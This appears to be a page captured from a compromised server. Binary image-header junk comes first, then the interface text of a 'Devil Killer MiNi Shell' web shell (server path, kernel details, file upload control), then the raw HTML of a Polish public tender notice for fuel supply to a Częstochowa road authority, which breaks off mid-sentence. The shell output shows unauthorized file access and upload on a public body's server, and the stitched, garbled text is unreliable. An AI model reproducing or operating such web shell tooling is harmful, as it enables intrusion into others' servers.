JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220216/0005835902-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej i oleju napędowego dla ODM nr 1 i 3 oraz dla PZD w Częstochowie w okresie od podpisania umowy przez 24 miesiące </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Częstochowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151406009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-217</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343229222</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343785468</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzd@czestochowa.powiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pzdczestochowa.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej i oleju napędowego dla ODM nr 1 i 3 oraz dla PZD w Częstochowie w okresie od podpisania umowy przez 24 miesiące </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7843863e-8ef7-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00058359</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00038775/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej i oleju napędowego dla ODM nr 1, 2 i 3 oraz dla PZD w Częstochowie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzd-czestochowa.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzdczestochowa.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z elektronicznej platformy usług Zamawiającego pod<br/>adresem:<br/>https://pzd-czestochowa.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE – dalej w skrócie zwane RODO,<br/>informujemy, iż:<br/>1. Administratorem Państwa danych osobowych jest Powiatowy Zarząd Dróg w Częstochowie z<br/>siedzibą przy ul. Jana III Sobieskiego 9, tel. 34/3229222, fax. 34/3785468<br/>2. Kontakt z inspektorem ochrony danych jest możliwy pod adresem: ido@czestochowa.powiat.pl<br/>3. Państwa dane osobowe przetwarzane będą na podstawie:<br/>art. 6 ust. 1 lit. b RODO - przetwarzanie jest niezbędne do zawarcia i realizacji umowy,<br/>art. 6. ust. 1 lit. c RODO - przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze, art. 6 ust. 1 lit. e RODO - przetwarzanie jest niezbędne do wykonania<br/>zadania realizowanego w interesie publicznym.<br/>4. Państwa dane osobowe będą wykorzystywane w celu udzielenia zamówienia publicznego na<br/>podstawie przepisów Prawa zamówień publicznych (Ustawa z dnia 11 września 2019r. Prawo<br/>zamówień publicznych z póżn. zmianami) dalej „ustawa Pzp” oraz po udzieleniu zamówienia, w celu<br/>realizacji umowy.<br/>5. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ustawy Pzp (Dz. U. z 2021r. poz. 1129 z późniejszymi<br/>zmianami).<br/>6. Państwa dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania<br/>w zakresie udzielenia zamówienia publicznego na podstawie ustawy Pzp oraz realizacji umowy do<br/>momentu wygaśnięcia obowiązków przetwarzania danych wynikających z przepisów prawa. Następnie<br/>dane osobowe zostaną zarchiwizowane zgodnie z obowiązującymi przepisami prawa. W przypadku<br/>unieważnienia postępowania o udzielenia zamówienia publicznego Państwa dane będą przetwarzane<br/>do momentu wygaśnięcia obowiązków ich przetwarzania wynikających z przepisów prawa, w tym<br/>przepisów dotyczących archiwizacji.<br/>7. Obowiązek podania przez Państwa danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>8. Posiadają Państwa następujące prawa:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>− na podstawie art. 16 RODO prawo do sprostowania *;<br/>− na podstawie art. 18 RODO prawo żądania od Administratora Danych Osobowych ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**;<br/>9. W przypadku uznania, iż przetwarzanie danych osobowych Administratora narusza przepisy RODO,<br/>przysługuje Państwu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul.<br/>Stawki 2, Warszawa 00-193).<br/>10. Nie przysługuje Państwu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>** Wyjaśnienie: W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art.18 ust.1 RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.272.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 1<br/>Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej 95 w ilości ok. 6.000 l (ok. 3.000 l na rok) i oleju napędowego w ilości ok. 60.000 l (ok. 30.000 l na rok) dla ODM nr 1 w Rudnikach w okresie od podpisania umowy przez 24 miesiące.<br/><br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości.<br/>Zamawiający przez okres obowiązywania umowy zastrzega sobie prawo do dwukrotnego przebadania pobranych próbek każdego rodzaju paliwa w niezależnym, akredytowanym laboratorium na koszt Oferenta. W przypadku potwierdzenia przeprowadzonymi badaniami braku odstępstw w jakości paliwa od obowiązujących norm, koszty badań ponosi Zamawiający.<br/>Stacja benzynowa musi być zlokalizowana w obrębie max 10 km od siedziby poszczególnych obwodów drogowych :<br/>siedziba ODM 1 Rudniki – ul. Dworcowa 26, 42-240 Rudniki;<br/>Dostawy będą realizowane na zasadzie doraźnych, bezgotówkowych tankowań pojazdów do zbiornika i kanistrów w sposób ciągły. <br/>Z tytułu każdorazowego zakupu paliwa Wykonawca otrzymywać będzie należność ustaloną na podstawie aktualnej w dniu zakupu (tankowania) ceny brutto jednego litra paliwa z uwzględnieniem udzielonego przez Wykonawcę upustu oraz ilości zakupionego (zatankowanego) przez Zamawiającego paliwa. <br/>Dostarczane paliwa muszą spełniać normy określone w Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2015 r., poz. 1680) oraz aktualne normy: PN-EN 228+A1 (dla benzyny bezołowiowej 95) i PN-EN 590+A1 (dla oleju napędowego). Wykonawca na każde żądanie Zamawiającego zobowiązany jest okazać stosowne „orzeczenie jakości paliwa”, w którym zawarte będą wyniki laboratoryjne badania dostarczonego paliwa, dotyczące zgodności paliwa z RMG z dnia 09.10.2015 r. dla paliw ciekłych. Wykonawca udziela min. 12 m-cy gwarancji na dostarczone paliwo, a w przypadku wykrycia uszkodzeń spowodowanych jego złą jakością, potwierdzonych ekspertyzą rzeczoznawcy, poniesie koszty napraw i ekspertyzy. W okresie zimowym Wykonawca zapewni Zamawiającemu paliwa przystosowane do niskich temperatur.<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca będzie zobowiązany dostosować jakość paliw do nowych norm.<br/>Ilość zakupionego paliwa będzie uzależniona od potrzeb Zamawiającego.<br/>Zamawiający dopuszcza możliwość zakupu mniejszej ilości paliw niż podanych w pkt 1, bez możliwości roszczeń finansowych ze strony Wykonawcy.<br/>4.8.	Dostawy będą wykonywane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą swz i umową warunkach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) kryterium oceny ofert jest: <br/>- cena ofertowa (z uwzględnieniem stałego upustu) waga 90 %. (Kc)<br/>- Odległość stacji od siedziby ODM waga 10 %(Kkm)<br/>2)	sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA <br/> a) Cena = Cena najniższa oferowana z uwzględnieniem stałego upustu (brutto)/ Cena badanej oferty z uwzględnieniem stałego upustu (brutto)x 100 punktów x 90 %<br/>b)	Zasady obliczenia punktowego w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM podany w liczbie kilometrów, którą Wykonawcy określą w formularzu ofertowym (zał. 1 do SIWZ). Punkty będą przyznawane w następujący sposób:<br/>-	0-2km - otrzymają 10,0 % - 10,00 pkt<br/>-	2-4km - otrzymają 7,5% - 7,5 pkt<br/>-	4-6km - otrzymają 5,0% - 5,0 pkt<br/>-	6-8km - otrzymają 2,5% - 2,5 pkt<br/>-	8-10km - otrzymają 0,0% - 0,0 pkt<br/><br/>Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według poniższego wzoru:<br/><br/>K = (Kc) + (Kkm) gdzie:<br/><br/>K – łączna ilość punktów uzyskana przez ofertę<br/>Kc – punkty uzyskane w kryterium CENA<br/>Kkm – punkty uzyskane w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM<br/><br/> UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA odległości stacji od siedziby ODM, zamawiający uzna, że wykonawca oferuje odległość przekraczającą wymaganą w powyższych zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019r: zostały określone w opisie przedmiotu zamówienia, ust. 4 pkt. 4.4 i 4.5. Dokumenty te wskazują parametry wszystkich materiałów i urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia jak również zasady wiedzy technicznej wymagane do wykonania zadania. Uwzględnią także wszystkie elementy, które mają wpływ na koszty związane z eksploatacją oraz utylizacją przedmiotu zamówienia. Dokumenty opisujące przedmiot zamówienia są tak precyzyjne, że bez względu na fakt, kto będzie wykonawcą przedmiotu zamówienia jedyną różnicą będą zaoferowane ceny (tzn. przedmiot zamówienia jest zestandaryzowany - identyczny, niezależnie od tego, który z wykonawców go wykona). W związku z powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego kryterium wyboru oferty najkorzystniejszej lub ceny, jako jednego z kryteriów wyboru oferty o znaczeniu ponad 60%.”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość stacji od siedziby ODM</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 2<br/>Sukcesywna dostawa w formie bezgotówkowej paliw ciekłych: benzyny bezołowiowej 95 w ilości ok. 4.600 l (w ilości ok. 2.300 l na rok) i oleju napędowego w ilości ok. 50.000 l (w ilości 25.000 l na rok) dla ODM nr 3 w Poczesnej w okresie od podpisania umowy przez 24 miesiące.<br/>Dostarczony przedmiot zamówienia musi być wysokiej jakości.<br/>Zamawiający przez okres obowiązywania umowy zastrzega sobie prawo do dwukrotnego przebadania pobranych próbek każdego rodzaju paliwa w niezależnym, akredytowanym laboratorium na koszt Oferenta. W przypadku potwierdzenia przeprowadzonymi badaniami braku odstępstw w jakości paliwa od obowiązujących norm, koszty badań ponosi Zamawiający.<br/>Stacja benzynowa musi być zlokalizowana w obrębie max 10 km od siedziby poszczególnych obwodów drogowych :<br/>-	siedziba ODM 3 Poczesna – ul. Bociana Górka 19, 42-262 Poczesna;<br/>Dostawy będą realizowane na zasadzie doraźnych, bezgotówkowych tankowań pojazdów do zbiornika i kanistrów w sposób ciągły. <br/>Z tytułu każdorazowego zakupu paliwa Wykonawca otrzymywać będzie należność ustaloną na podstawie aktualnej w dniu zakupu (tankowania) ceny brutto jednego litra paliwa z uwzględnieniem udzielonego przez Wykonawcę upustu oraz ilości zakupionego (zatankowanego) przez Zamawiającego paliwa. <br/>Dostarczane paliwa muszą spełniać normy określone w Rozporządzeniu Ministra Gospodarki z dnia 9 października 2015r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2015 r., poz. 1680) oraz aktualne normy: PN-EN 228+A1 (dla benzyny bezołowiowej 95) i PN-EN 590+A1 (dla oleju napędowego). Wykonawca na każde żądanie Zamawiającego zobowiązany jest okazać stosowne „orzeczenie jakości paliwa”, w którym zawarte będą wyniki laboratoryjne badania dostarczonego paliwa, dotyczące zgodności paliwa z RMG z dnia 09.10.2015 r. dla paliw ciekłych. Wykonawca udziela min. 12 m-cy gwarancji na dostarczone paliwo, a w przypadku wykrycia uszkodzeń spowodowanych jego złą jakością, potwierdzonych ekspertyzą rzeczoznawcy, poniesie koszty napraw i ekspertyzy. W okresie zimowym Wykonawca zapewni Zamawiającemu paliwa przystosowane do niskich temperatur.<br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania umowy, Wykonawca będzie zobowiązany dostosować jakość paliw do nowych norm.<br/>Ilość zakupionego paliwa będzie uzależniona od potrzeb Zamawiającego.<br/>Zamawiający dopuszcza możliwość zakupu mniejszej ilości paliw niż podanych w pkt 1, bez możliwości roszczeń finansowych ze strony Wykonawcy.<br/>Dostawy będą wykonywane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą swz i umową warunkach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) kryterium oceny ofert jest: <br/>- cena ofertowa (z uwzględnieniem stałego upustu) waga 90 %. (Kc)<br/>- Odległość stacji od siedziby ODM waga 10 %(Kkm)<br/>2)	sposób oceny<br/>a) Wzór do obliczenia punktowego w kryterium CENA <br/> a) Cena = Cena najniższa oferowana z uwzględnieniem stałego upustu (brutto)/ Cena badanej oferty z uwzględnieniem stałego upustu (brutto)x 100 punktów x 90 %<br/>b)	Zasady obliczenia punktowego w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM podany w liczbie kilometrów, którą Wykonawcy określą w formularzu ofertowym (zał. 1 do SIWZ). Punkty będą przyznawane w następujący sposób:<br/>-	0-2km - otrzymają 10,0 % - 10,00 pkt<br/>-	2-4km - otrzymają 7,5% - 7,5 pkt<br/>-	4-6km - otrzymają 5,0% - 5,0 pkt<br/>-	6-8km - otrzymają 2,5% - 2,5 pkt<br/>-	8-10km - otrzymają 0,0% - 0,0 pkt<br/><br/>Łączna ilość punktów uzyskanych przez ofertę zostanie obliczona według poniższego wzoru:<br/><br/>K = (Kc) + (Kkm) gdzie:<br/><br/>K – łączna ilość punktów uzyskana przez ofertę<br/>Kc – punkty uzyskane w kryterium CENA<br/>Kkm – punkty uzyskane w kryterium ODLEGŁOŚĆ STACJI OD SIEDZIBY ODM<br/><br/> UWAGA: W przypadku, jeżeli wykonawca nie poda w Formularzu OFERTA odległości stacji od siedziby ODM, zamawiający uzna, że wykonawca oferuje odległość przekraczającą wymaganą w powyższych zapisach i nie przyzna punktów za to kryterium oceny ofert.<br/>„Wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, o których mowa w art. 246 ust. 2 Pzp z 11.09.2019r: zostały określone w opisie przedmiotu zamówienia, ust. 4 pkt. 4.4 i 4.5. Dokumenty te wskazują parametry wszystkich materiałów i urządzeń, które będą musiały być użyte do realizacji przedmiotu zamówienia 